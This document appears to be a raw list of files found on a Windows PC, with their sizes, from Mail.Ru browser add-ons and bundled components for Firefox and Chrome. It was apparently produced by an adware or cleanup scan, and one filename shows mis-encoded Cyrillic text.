C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\themes\themes__arrow-left.png (386 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\newtabhomepage.js (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions.json (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\informers\weather\09.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mail.Ru\Tmp\ffplugin.7z (518585 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\lib\version.js (89 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\loading.gif (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\js\libs\knockout-2.2.1.js (41 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\themes\preview\body__bg-13.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\main.js (392 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\themes\themes__theme-fade-ok.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\js\modules\bookmarks\updates.js (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\logo.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\jedelkhanefmcnpappfhachbpnlhomai\1.0.7_0\icons\48.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\META-INF\manifest.mf (28 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\jedelkhanefmcnpappfhachbpnlhomai\1.0.7_0\icons\16.png (586 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\slide__control\slide__control-delete.png (209 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\background\modules.js (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\informers\weather\07.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\informers\weather\06.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\css\informers.css (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\informers\weather\02.png (808 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\clock.png (814 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\themes\wood.png (674 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\themes\preview\_cookies.jpg (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\cross.png (556 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\themes\preview\body__bg-8.png (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\add_button.png (569 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\multiauth.gif (456 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\js\application_core\file-system.js (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\skin\vb-logo.png (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\js\sandbox\facade.js (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\informers\weather\01.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\js\modules\mail-counter.js (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\menu__item\menu__item-3.png (723 bytes)
C:\Users\"%CurrentUserName%"\Favorites\Mail.Ru ÃÂÃÂ³ÃÂµÃÂ½Ã‘â€š - ÃÂ¸Ã‘ÂÃÂ¿ÃÂ¾ÃÂ»Ã‘Å’ÃÂ·Ã‘Æ’ÃÂ¹ ÃÂ´ÃÂ»Ã‘Â ÃÂ¾ÃÂ±Ã‘â€°ÃÂµÃÂ½ÃÂ¸Ã‘Â!.url (210 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\jedelkhanefmcnpappfhachbpnlhomai\1.0.7_0\manifest.json (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\themes\preview\body__bg-5.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\themes\flax.jpg (119 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\informers\exchange\exchange-1.png (407 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\themes\body__bg-9.jpg (152 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\weather\07.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\css\grid.css (450 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\searchplugins\mailru.xml (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\themes\body__bg-3.jpg (119 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\themes\preview\body__bg-9.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\weather\03.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\informers\weather\08.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\themes\body__bg-4.jpg (255 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\themes\preview\body__bg-11.png (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\themes\preview\_fabric.jpg (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\background\background.html (610 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\menu__item\menu__item-4.png (802 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\16x16.png (448 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\weather\05.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\themes\themes__arrow-right.png (368 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\sgmus.png (211 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\favicon.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\css\searchbar.css (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\weather\09.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\thumbnails\torg.mail.ru.jpeg (60 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\jedelkhanefmcnpappfhachbpnlhomai\manifest.json (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\reg1.bg.v2.png (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\js\utils\utils.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\js\main.js (268 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\css\general.css (961 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\thumbnails\games.mail.ru.jpeg (76 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\themes\preview\leather.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\48x48.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\themes\preview\body__bg-3.png (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mail.Ru\Tmp\gdknicmnhbaajdglbinpahhapghpakch.7z (3172 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\informers\weather\03.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\search_bg.png (499 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\search-metadata.json (128 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\themes\preview\body__bg-1.png (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions.ini (280 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\overlay.xul (442 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\jedelkhanefmcnpappfhachbpnlhomai\1.0.7_0\icons\512.png (21 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\js\libs\jquery.js (93 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\themes\body__bg-6.jpg (86 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\META-INF\zigbert.rsa (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\css\customScrollbar.css (320 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\Utils.js (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\ajax_loader_mc.gif (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\weather\01.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\css\dialog.css (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Mail.Ru.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\slide__control\slide__control-edit-hover.png (406 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\weather\08.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\weather\10.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\themes\body__bg-8.jpg (95 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mail.Ru\Tmp\jedelkhanefmcnpappfhachbpnlhomai.7z (3172 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\js\modules\currency.js (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\themes\preview\body__bg-6.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\no_photo.png (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\js\modules\searchbar.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\themes\body__bg-10.jpg (157 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\js\proto\slider.js (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ie.reg (128 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\js\modules\odnoklassniki-counter.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\js\application_core\sqliteStorage.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mail.Ru\Sputnik\MailRu.ico (14076 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\themes\body__bg-7.jpg (193 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\themes\cookies.jpg (52 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\js\proto\pane.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\menu__item\menu__item-1.png (622 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\js\proto\tab-strip.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mail.Ru\Tmp\pganlglbhgfjfgopijbhemcpbehjnpia.7z (494308 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\thumbnails\calendar.mail.ru.jpeg (41 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\informers\traffic\informers__traffic-jam.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\css\slide.css (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\themes\body__bg-1.jpg (244 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\themes\preview\_wall.jpg (10 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\slide__control\slide__control-delete-hover.png (323 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\jedelkhanefmcnpappfhachbpnlhomai\1.0.7_0\_metadata\computed_hashes.json (371 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\visual-bookmarks.html (13 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\weather\02.png (808 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\pane-arrow.png (844 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\META-INF\zigbert.sf (28 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\p-main_sub__gradient.png (976 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\jedelkhanefmcnpappfhachbpnlhomai\1.0.7_0\icons\128.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\thumbnails\travel.mail.ru.jpeg (80 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\themes\body__bg-13.jpg (107 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\themes\themes__theme-fade-wrong.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\themes\preview\wood.png (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\weather\06.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\css\news.css (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\js\modules\geo-monitoring.js (2 bytes)
